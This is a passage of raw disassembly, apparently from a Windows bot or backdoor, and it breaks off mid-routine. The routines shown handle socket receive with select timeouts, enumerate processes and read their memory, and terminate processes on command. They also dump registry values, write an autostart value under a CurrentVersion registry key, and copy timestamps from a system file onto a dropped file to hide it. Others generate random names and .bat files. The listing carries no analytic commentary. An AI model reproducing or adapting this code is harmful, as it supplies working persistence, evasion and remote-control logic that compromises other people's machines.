; sub_403DAD+1F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
cmp esi, 2
push edi
jb short loc_403D96
mov edi, [esp+8+arg_4]
lea eax, [esi-1]
push 0
push eax
push edi
push [esp+14h+arg_0]
call ds:dword_411258 ; recv
test eax, eax
jz short loc_403DAA
cmp eax, 0FFFFFFFFh
jz short loc_403DAA
cmp eax, esi
jb short loc_403DA6
loc_403D96: ; CODE XREF: sub_403D69+9�j
push 271Eh
call ds:dword_411244 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short loc_403DAA
; ---------------------------------------------------------------------------
loc_403DA6: ; CODE XREF: sub_403D69+2B�j
and byte ptr [eax+edi], 0
loc_403DAA: ; CODE XREF: sub_403D69+22�j
; sub_403D69+27�j ...
pop edi
pop esi
retn
sub_403D69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DAD proc near ; CODE XREF: sub_402018+70�p
; sub_402018+195�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_403DD6
pop ecx
test eax, eax
pop ecx
jnz short loc_403DC3
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403DC3: ; CODE XREF: sub_403DAD+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403D69
add esp, 0Ch
pop ebp
retn
sub_403DAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DD6 proc near ; CODE XREF: sub_403DAD+9�p
; sub_40AD2B+19�p ...
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_80C = dword ptr -80Ch
var_808 = dword ptr -808h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1010h
call sub_4108B0
mov eax, [ebp+arg_4]
mov ecx, 3E8h
push ebx
xor edx, edx
mov ebx, ecx
push esi
div ebx
xor edx, edx
push edi
push 1
mov edi, [ebp+arg_0]
pop esi
mov [ebp+var_808], edi
mov [ebp+var_80C], esi
mov [ebp+var_100C], edi
mov [ebp+var_1010], esi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
div ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_80C]
push 0
push eax
push esi
imul edx, 3E8h
mov [ebp+var_4], edx
call ds:dword_411214 ; select
cmp eax, esi
jz short loc_403E48
xor eax, eax
jmp short loc_403E5B
; ---------------------------------------------------------------------------
loc_403E48: ; CODE XREF: sub_403DD6+6C�j
lea eax, [ebp+var_80C]
push eax
push edi
call sub_410B58 ; __WSAFDIsSet
neg eax
sbb eax, eax
neg eax
loc_403E5B: ; CODE XREF: sub_403DD6+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_403DD6 endp
; =============== S U B R O U T I N E =======================================
sub_403E60 proc near ; CODE XREF: sub_4014B0+53�p
; sub_4018D5+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
jnz short loc_403E85
push esi
mov esi, [esp+4+arg_0]
push 1A3h
push 0
push esi
call sub_410850 ; memset
add esp, 0Ch
mov byte ptr [esi+198h], 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_403E85: ; CODE XREF: sub_403E60+5�j
push 1A3h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_410838 ; memcpy
add esp, 0Ch
retn
sub_403E60 endp
; =============== S U B R O U T I N E =======================================
sub_403E9B proc near ; CODE XREF: seg000:0041060C�p
var_8 = dword ptr -8
push edi
push offset dword_417FE0
call sub_406AB6
mov [esp+8+var_8], offset aPsapi_dll ; "psapi.dll"
call ds:dword_41105C ; LoadLibraryA
mov edi, eax
test edi, edi
jz short loc_403F1B
push esi
mov esi, ds:dword_411060
push offset aEnumprocesses ; "EnumProcesses"
push edi
call esi ; GetProcAddress
push offset aEnumprocessmod ; "EnumProcessModules"
push edi
mov dword_417FDC, eax
call esi ; GetProcAddress
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push edi
mov dword_417FD0, eax
call esi ; GetProcAddress
push offset aGetmoduleinfor ; "GetModuleInformation"
push edi
mov dword_417FD4, eax
call esi ; GetProcAddress
cmp dword_417FDC, 0
mov dword_417FD8, eax
pop esi
jz short loc_403F1B
cmp dword_417FD0, 0
jz short loc_403F1B
cmp dword_417FD4, 0
jz short loc_403F1B
test eax, eax
jz short loc_403F1B
mov byte_417FFC, 1
loc_403F1B: ; CODE XREF: sub_403E9B+1C�j
; sub_403E9B+61�j ...
pop edi
retn
sub_403E9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F1D proc near ; CODE XREF: sub_4011C4+56�p
; sub_404143+2A�p
var_125 = byte ptr -125h
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
push offset dword_417FE0
call sub_406AE4
cmp byte_417FFC, 0
pop ecx
jnz short loc_403F44
loc_403F3D: ; CODE XREF: sub_403F1D+35�j
; sub_403F1D+4C�j ...
xor esi, esi
jmp loc_404126
; ---------------------------------------------------------------------------
loc_403F44: ; CODE XREF: sub_403F1D+1E�j
and [ebp+var_14], 0
push 0
call sub_41082C ; malloc
test eax, eax
pop ecx
jz short loc_403F3D
mov esi, 80h
push esi
mov ebx, esi
push eax
loc_403F5D: ; CODE XREF: sub_403F1D+6D�j
call sub_4108E6 ; realloc
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jz short loc_403F3D
lea eax, [ebp+var_14]
push eax
push ebx
push [ebp+var_4]
call dword_417FDC
test eax, eax
jz short loc_403FAA
mov edi, [ebp+var_14]
cmp edi, ebx
jb short loc_403F8C
add ebx, esi
push ebx
push [ebp+var_4]
jmp short loc_403F5D
; ---------------------------------------------------------------------------
loc_403F8C: ; CODE XREF: sub_403F1D+65�j
shr edi, 2
mov eax, edi
mov [ebp+var_10], edi
imul eax, 114h
add eax, 8
push eax
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_403FB5
loc_403FAA: ; CODE XREF: sub_403F1D+5E�j
push [ebp+var_4]
call sub_410832 ; free
pop ecx
jmp short loc_403F3D
; ---------------------------------------------------------------------------
loc_403FB5: ; CODE XREF: sub_403F1D+8B�j
lea eax, [esi+8]
mov [esi], edi
test edi, edi
mov [esi+4], eax
jbe short loc_40400A
mov eax, [ebp+var_4]
xor ebx, ebx
mov [ebp+var_8], eax
mov [ebp+var_C], edi
loc_403FCC: ; CODE XREF: sub_403F1D+E8�j
mov edi, 114h
push edi
push 0
push dword ptr [esi+4]
call sub_410850 ; memset
mov ecx, [ebp+var_8]
mov eax, [esi+4]
push offset aSystem ; "system"
mov ecx, [ecx]
mov [ebx+eax], ecx
mov eax, [esi+4]
lea eax, [ebx+eax+0Ch]
push eax
call sub_410820 ; _mbscpy
add [ebp+var_8], 4
add esp, 14h
add ebx, edi
dec [ebp+var_C]
jnz short loc_403FCC
mov edi, [ebp+var_10]
loc_40400A: ; CODE XREF: sub_403F1D+A2�j
push [ebp+var_4]
call sub_410832 ; free
test edi, edi
pop ecx
jbe loc_404126
xor ebx, ebx
mov [ebp+var_4], edi
loc_404020: ; CODE XREF: sub_403F1D+203�j
mov eax, [esi+4]
push dword ptr [ebx+eax]
push 0
push 410h
call ds:dword_41109C ; OpenProcess
mov edi, eax
test edi, edi
mov [ebp+var_8], edi
jz loc_404117
and [ebp+var_10], 0
and [ebp+var_C], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push 4
push eax
push edi
call dword_417FD0
test eax, eax
jnz short loc_404063
push edi
jmp loc_404111
; ---------------------------------------------------------------------------
loc_404063: ; CODE XREF: sub_403F1D+13E�j
lea eax, [ebp+var_20]
push 0Ch
push eax
push [ebp+var_C]
push edi
call dword_417FD8
mov eax, [esi+4]
mov ecx, [ebp+var_20]
push 40h
lea edi, [ebp+var_123]
mov [ebx+eax+4], ecx
mov eax, [esi+4]
mov ecx, [ebp+var_1C]
mov [ebx+eax+8], ecx
mov al, byte_417B60
mov [ebp+var_124], al
pop ecx
xor eax, eax
rep stosd
stosw
stosb
mov edi, 104h
lea eax, [ebp+var_124]
push edi
push eax
push [ebp+var_20]
push [ebp+var_8]
call dword_417FD4
test eax, eax
jz short loc_40410E
cmp [ebp+var_124], 0
jz short loc_40410E
lea eax, [ebp+var_124]
push edi
push eax
mov eax, [esi+4]
lea eax, [ebx+eax+0Ch]
push eax
call sub_41083E ; strncpy
lea eax, [ebp+var_124]
push eax
call sub_410826 ; strlen
add esp, 10h
test eax, eax
jz short loc_40410E
loc_4040F0: ; CODE XREF: sub_403F1D+1E3�j
cmp eax, 1
jbe short loc_40410E
cmp [ebp+eax+var_125], 5Ch
jz short loc_404104
dec eax
jnz short loc_4040F0
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_404104: ; CODE XREF: sub_403F1D+1E0�j
mov ecx, [esi+4]
mov [ebx+ecx+110h], eax
loc_40410E: ; CODE XREF: sub_403F1D+1A0�j
; sub_403F1D+1A9�j ...
push [ebp+var_8]
loc_404111: ; CODE XREF: sub_403F1D+141�j
call ds:dword_4110AC ; CloseHandle
loc_404117: ; CODE XREF: sub_403F1D+11D�j
add ebx, 114h
dec [ebp+var_4]
jnz loc_404020
loc_404126: ; CODE XREF: sub_403F1D+22�j
; sub_403F1D+F8�j
push offset dword_417FE0
call sub_406AEF
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_403F1D endp
; =============== S U B R O U T I N E =======================================
sub_404138 proc near ; CODE XREF: sub_4011C4+27B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_410832 ; free
pop ecx
retn
sub_404138 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404143 proc near ; DATA XREF: sub_404202+2F�o
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push esi
push edi
push 1A7h
lea eax, [ebp+var_1A8]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
call sub_403F1D
mov esi, eax
xor edi, edi
cmp esi, edi
jz short loc_4041EE
mov eax, [ebp+var_1A8]
push ebx
push dword ptr [esi]
push dword ptr [eax]
lea eax, [ebp+var_1A4]
push offset dword_412AE8
push eax
call sub_408D50
add esp, 10h
xor ebx, ebx
cmp [esi], edi
jle short loc_4041E6
loc_40419F: ; CODE XREF: sub_404143+A1�j
push 3E8h
call ds:dword_4110A4 ; Sleep
mov eax, [esi+4]
add eax, edi
lea ecx, [eax+0Ch]
push ecx
push dword ptr [eax+8]
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_1A4]
push offset dword_412AD0
push eax
call sub_408D50
mov eax, [ebp+var_1A8]
add esp, 18h
cmp dword ptr [eax+4], 0
jnz short loc_4041E6
inc ebx
add edi, 114h
cmp ebx, [esi]
jl short loc_40419F
loc_4041E6: ; CODE XREF: sub_404143+5A�j
; sub_404143+96�j
push esi
call sub_410832 ; free
pop ecx
pop ebx
loc_4041EE: ; CODE XREF: sub_404143+35�j
push [ebp+var_1A8]
call sub_406753
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_404143 endp
; =============== S U B R O U T I N E =======================================
sub_404202 proc near ; CODE XREF: sub_40735A+2BA�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40423E
push 1A3h
lea eax, [esi+4]
push [esp+8+arg_0]
push eax
call sub_410838 ; memcpy
add esp, 0Ch
push offset dword_412B10
push 0
push esi
push offset sub_404143
call sub_40663C
add esp, 10h
loc_40423E: ; CODE XREF: sub_404202+10�j
pop esi
retn
sub_404202 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404240 proc near ; CODE XREF: sub_40735A+3C2�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
jz loc_404312
cmp [ebp+arg_C], 0
jz loc_404312
push [ebp+arg_4]
call sub_41088C ; atoi
push [ebp+arg_8]
mov ebx, eax
call sub_407290
push [ebp+arg_C]
mov [ebp+arg_8], eax
call sub_41088C ; atoi
mov esi, eax
mov eax, 180h
add esp, 0Ch
cmp esi, eax
jbe short loc_404287
mov esi, eax
loc_404287: ; CODE XREF: sub_404240+43�j
lea eax, [esi+1]
push eax
call sub_41082C ; malloc
pop ecx
mov edi, eax
push ebx
xor ebx, ebx
push ebx
push 10h
call ds:dword_41109C ; OpenProcess
cmp eax, ebx
mov [ebp+arg_C], eax
jnz short loc_4042AF
push edi
call sub_410832 ; free
pop ecx
jmp short loc_404312
; ---------------------------------------------------------------------------
loc_4042AF: ; CODE XREF: sub_404240+64�j
lea ecx, [ebp+arg_4]
mov [ebp+arg_4], ebx
push ecx
push esi
push edi
push [ebp+arg_8]
push eax
call ds:dword_4110A0 ; ReadProcessMemory
test eax, eax
jz short loc_404302
cmp [ebp+arg_4], ebx
jz short loc_404302
and byte ptr [edi+esi], 0
xor ecx, ecx
cmp [ebp+arg_4], ebx
jbe short loc_4042F7
loc_4042D6: ; CODE XREF: sub_404240+B5�j
mov al, [ecx+edi]
cmp al, 0Ah
jz short loc_4042ED
cmp al, 0Dh
jz short loc_4042ED
cmp al, 1Fh
jz short loc_4042ED
cmp al, 16h
jz short loc_4042ED
cmp al, 10h
jg short loc_4042F1
loc_4042ED: ; CODE XREF: sub_404240+9B�j
; sub_404240+9F�j ...
mov byte ptr [ecx+edi], 2Eh
loc_4042F1: ; CODE XREF: sub_404240+AB�j
inc ecx
cmp ecx, [ebp+arg_4]
jb short loc_4042D6
loc_4042F7: ; CODE XREF: sub_404240+94�j
push edi
push [ebp+arg_0]
call sub_408D50
pop ecx
pop ecx
loc_404302: ; CODE XREF: sub_404240+84�j
; sub_404240+89�j
push edi
call sub_410832 ; free
pop ecx
push [ebp+arg_C]
call ds:dword_4110AC ; CloseHandle
loc_404312: ; CODE XREF: sub_404240+A�j
; sub_404240+14�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_404240 endp
; =============== S U B R O U T I N E =======================================
sub_404317 proc near ; CODE XREF: sub_40735A+2A1�p
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
push esi
jz short loc_404352
push [esp+4+arg_4]
call sub_41088C ; atoi
pop ecx
mov esi, eax
call ds:dword_4110F0 ; GetCurrentProcessId
cmp esi, eax
jz short loc_404352
push esi
push 0
push 1
call ds:dword_41109C ; OpenProcess
mov esi, eax
push 0
push esi
call ds:dword_4110A8 ; TerminateProcess
push esi
call ds:dword_4110AC ; CloseHandle
loc_404352: ; CODE XREF: sub_404317+6�j
; sub_404317+1C�j
pop esi
retn
sub_404317 endp
; =============== S U B R O U T I N E =======================================
sub_404354 proc near ; CODE XREF: sub_402EFD+10B�p
; sub_40735A+9A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
loc_40435C: ; CODE XREF: sub_404354+1A�j
push 7Ah
push 61h
call sub_40AADE
mov [esi+edi], al
inc esi
pop ecx
cmp esi, 8
pop ecx
jl short loc_40435C
and byte ptr [edi+8], 0
mov edi, [esp+8+arg_4]
xor esi, esi
loc_40437A: ; CODE XREF: sub_404354+38�j
push 7Ah
push 61h
call sub_40AADE
mov [esi+edi], al
inc esi
pop ecx
cmp esi, 6
pop ecx
jl short loc_40437A
and byte ptr [edi+6], 0
mov edi, [esp+8+arg_8]
xor esi, esi
loc_404398: ; CODE XREF: sub_404354+56�j
push 7Ah
push 61h
call sub_40AADE
mov [esi+edi], al
inc esi
pop ecx
cmp esi, 10h
pop ecx
jl short loc_404398
and byte ptr [edi+10h], 0
pop edi
pop esi
retn
sub_404354 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043B3 proc near ; CODE XREF: sub_40735A+703�p
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4045DF
cmp byte ptr [edi+4], 5Ch
jnz loc_4045DF
push 4
pop esi
push esi
push offset aHkcr ; "HKCR"
push edi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4043F3
mov [ebp+arg_4], 80000000h
jmp short loc_404449
; ---------------------------------------------------------------------------
loc_4043F3: ; CODE XREF: sub_4043B3+35�j
push esi
push offset aHkcu ; "HKCU"
push edi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40440F
mov [ebp+arg_4], 80000001h
jmp short loc_404449
; ---------------------------------------------------------------------------
loc_40440F: ; CODE XREF: sub_4043B3+51�j
push esi
push offset aHklm ; "HKLM"
push edi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40442B
mov [ebp+arg_4], 80000002h
jmp short loc_404449
; ---------------------------------------------------------------------------
loc_40442B: ; CODE XREF: sub_4043B3+6D�j
push esi
push offset aHkus ; "HKUS"
push edi
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_4045DF
mov [ebp+arg_4], 80000003h
loc_404449: ; CODE XREF: sub_4043B3+3E�j
; sub_4043B3+5A�j ...
add edi, 5
push edi
call sub_410826 ; strlen
mov esi, eax
pop ecx
test esi, esi
jz loc_4045DF
loc_40445D: ; CODE XREF: sub_4043B3+B1�j
cmp byte ptr [esi+edi], 5Ch
jz short loc_40446B
dec esi
jnz short loc_40445D
jmp loc_4045DF
; ---------------------------------------------------------------------------
loc_40446B: ; CODE XREF: sub_4043B3+AE�j
lea eax, [esi+edi+1]
push eax
call sub_410826 ; strlen
mov ebx, 200h
pop ecx
cmp eax, ebx
jnb loc_4045DF
lea eax, [esi+edi+1]
push eax
lea eax, [ebp+var_414]
push eax
call sub_410820 ; _mbscpy
pop ecx
cmp esi, ebx
pop ecx
jnb loc_4045DF
push esi
lea eax, [ebp+var_214]
push edi
push eax
call sub_410838 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
and [ebp+esi+var_214], 0
push eax
push 1
lea eax, [ebp+var_214]
push 0
push eax
push [ebp+arg_4]
call ds:dword_411000 ; RegOpenKeyExA
test eax, eax
jnz loc_4045DF
mov eax, 1000h
push eax
mov [ebp+var_C], eax
call sub_41082C ; malloc
mov esi, eax
pop ecx
lea eax, [ebp+var_C]
mov [ebp+var_10], esi
push eax
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_414]
push 0
push eax
push [ebp+var_14]
call ds:dword_41100C ; RegQueryValueExA
test eax, eax
jnz loc_4045CF
cmp [ebp+var_8], 1
mov ebx, offset dword_412B30
jz short loc_40451F
cmp [ebp+var_8], 2
jnz short loc_40452C
loc_40451F: ; CODE XREF: sub_4043B3+164�j
push esi
push ebx
push [ebp+arg_0]
call sub_408D50
add esp, 0Ch
loc_40452C: ; CODE XREF: sub_4043B3+16A�j
cmp [ebp+var_8], 4
jnz short loc_404544
push dword ptr [esi]
push offset dword_412B28
push [ebp+arg_0]
call sub_408D50
add esp, 0Ch
loc_404544: ; CODE XREF: sub_4043B3+17D�j
cmp [ebp+var_8], 3
jnz loc_4045CF
mov edi, 180h
push edi
call sub_41082C ; malloc
and [ebp+var_4], 0
mov esi, eax
pop ecx
and byte ptr [esi], 0
cmp [ebp+var_C], 0
jbe short loc_4045B9
loc_404569: ; CODE XREF: sub_4043B3+204�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
movzx eax, byte ptr [ecx+eax]
push eax
lea eax, [ebp+arg_4]
push offset dword_412B20
push eax
call sub_410844 ; sprintf
push esi
call sub_410826 ; strlen
add eax, 3
add esp, 10h
cmp eax, edi
jb short loc_4045A2
push esi
push ebx
push [ebp+arg_0]
call sub_408D50
add esp, 0Ch
and byte ptr [esi], 0
loc_4045A2: ; CODE XREF: sub_4043B3+1DD�j
lea eax, [ebp+arg_4]
push eax
push esi
call sub_410856 ; _mbscat
inc [ebp+var_4]
pop ecx
mov eax, [ebp+var_4]
pop ecx
cmp eax, [ebp+var_C]
jb short loc_404569
loc_4045B9: ; CODE XREF: sub_4043B3+1B4�j
push esi
push ebx
push [ebp+arg_0]
call sub_408D50
push esi
call sub_410832 ; free
mov esi, [ebp+var_10]
add esp, 10h
loc_4045CF: ; CODE XREF: sub_4043B3+155�j
; sub_4043B3+195�j
push esi
call sub_410832 ; free
pop ecx
push [ebp+var_14]
call ds:dword_411028 ; RegCloseKey
loc_4045DF: ; CODE XREF: sub_4043B3+11�j
; sub_4043B3+1B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4043B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045E4 proc near ; CODE XREF: sub_4088FC:loc_408A4D�p
; sub_408F9D:loc_409243�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 208h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_104]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_208]
push offset dword_417978
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_208]
push eax
call sub_40AC4E
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_104]
push eax
call sub_410856 ; _mbscat
add esp, 1Ch
lea eax, [ebp+var_104]
push eax
call ds:dword_4110B8 ; DeleteFileA
lea eax, [ebp+var_104]
push offset dword_4122AC
push eax
call sub_41086E ; fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40468E
push esi
push 1
push 2
push offset dword_412DAC
call sub_410862 ; fwrite
push esi
call sub_410868 ; fclose
lea eax, [ebp+var_104]
push eax
call sub_404715
add esp, 18h
loc_40468E: ; CODE XREF: sub_4045E4+84�j
pop esi
leave
retn
sub_4045E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404691 proc near ; CODE XREF: sub_4088FC+117�p
; sub_408F9D+26C�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 208h
lea eax, [ebp+var_104]
push 104h
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_104]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_208]
push offset dword_417978
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_208]
push eax
call sub_40AC4E
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_104]
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_41086E ; fopen
add esp, 24h
test eax, eax
jz short loc_404711
push eax
call sub_410868 ; fclose
pop ecx
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_404711: ; CODE XREF: sub_404691+72�j
xor eax, eax
leave
retn
sub_404691 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404715 proc near ; CODE XREF: sub_4045E4+A2�p
; sub_4049B5+1B5�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
lea eax, [ebp+var_11C]
push 104h
push eax
call ds:dword_411044 ; GetWindowsDirectoryA
lea eax, [ebp+var_11C]
push offset dword_412DB4
push eax
call sub_410856 ; _mbscat
pop ecx
mov esi, ds:dword_411048
pop ecx
mov edi, 80h
push 0
push edi
push 3
push 0
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4047BB
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_41104C ; GetFileTime
push ebx
mov ebx, ds:dword_4110AC
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4047BB
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_411050 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_4047BB: ; CODE XREF: sub_404715+58�j
; sub_404715+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404715 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047C0 proc near ; CODE XREF: sub_4049B5+139�p
; sub_4049B5+16F�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push esi
xor esi, esi
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_411014 ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40484B
lea eax, [ebp+var_108]
push 104h
push eax
call ds:dword_411054 ; GetSystemDirectoryA
lea eax, [ebp+var_108]
push offset dword_412DB0
push eax
call sub_410856 ; _mbscat
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_410856 ; _mbscat
add esp, 10h
lea eax, [ebp+var_108]
push eax
call ds:dword_411040 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push esi
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_411010 ; RegSetValueExA
jmp short loc_404857
; ---------------------------------------------------------------------------
loc_40484B: ; CODE XREF: sub_4047C0+2D�j
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_411004 ; RegDeleteValueA
loc_404857: ; CODE XREF: sub_4047C0+89�j
push [ebp+var_4]
call ds:dword_411028 ; RegCloseKey
pop esi
leave
retn
sub_4047C0 endp
; =============== S U B R O U T I N E =======================================
sub_404863 proc near ; CODE XREF: sub_40488C+2B�p
; sub_4049B5+1C1�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
mov edi, esi
call sub_410826 ; strlen
pop ecx
xor ecx, ecx
test eax, eax
jbe short loc_404887
loc_404878: ; CODE XREF: sub_404863+22�j
cmp byte ptr [ecx+esi], 5Ch
jnz short loc_404882
lea edi, [ecx+esi+1]
loc_404882: ; CODE XREF: sub_404863+19�j
inc ecx
cmp ecx, eax
jb short loc_404878
loc_404887: ; CODE XREF: sub_404863+13�j
mov eax, edi
pop edi
pop esi
retn
sub_404863 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40488C proc near ; CODE XREF: sub_4049B5+C�p
; sub_404BC3+C�p
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push eax
call sub_404863
and byte ptr [eax], 0
pop ecx
lea eax, [ebp+var_104]
push eax
call ds:dword_41103C ; SetCurrentDirectoryA
leave
retn
sub_40488C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048CF proc near ; CODE XREF: sub_4049B5+1C7�p
; sub_404BC3+C2�p ...
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
push 8
push 4
call sub_40AADE
push 7Ah
push 61h
mov edi, eax
call sub_40AADE
add esp, 10h
mov [ebp+var_14], al
push 1
pop esi
cmp edi, esi
jz short loc_40490D
loc_4048F9: ; CODE XREF: sub_4048CF+3C�j
push 7Ah
push 61h
call sub_40AADE
mov [ebp+esi+var_14], al
inc esi
pop ecx
cmp esi, edi
pop ecx
jnz short loc_4048F9
loc_40490D: ; CODE XREF: sub_4048CF+28�j
lea eax, [ebp+esi+var_14]
push offset a_bat ; ".bat"
push eax
call sub_410820 ; _mbscpy
mov edi, [ebp+arg_0]
push edi
call sub_410826 ; strlen
push 400h
call sub_41082C ; malloc
add esp, 10h
mov ebx, eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4110B8 ; DeleteFileA
xor esi, esi
lea eax, [ebp+var_14]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_411048 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_404961
xor eax, eax
jmp short loc_4049B0
; ---------------------------------------------------------------------------
loc_404961: ; CODE XREF: sub_4048CF+8C�j
lea eax, [ebp+var_14]
push eax
push edi
push edi
push edi
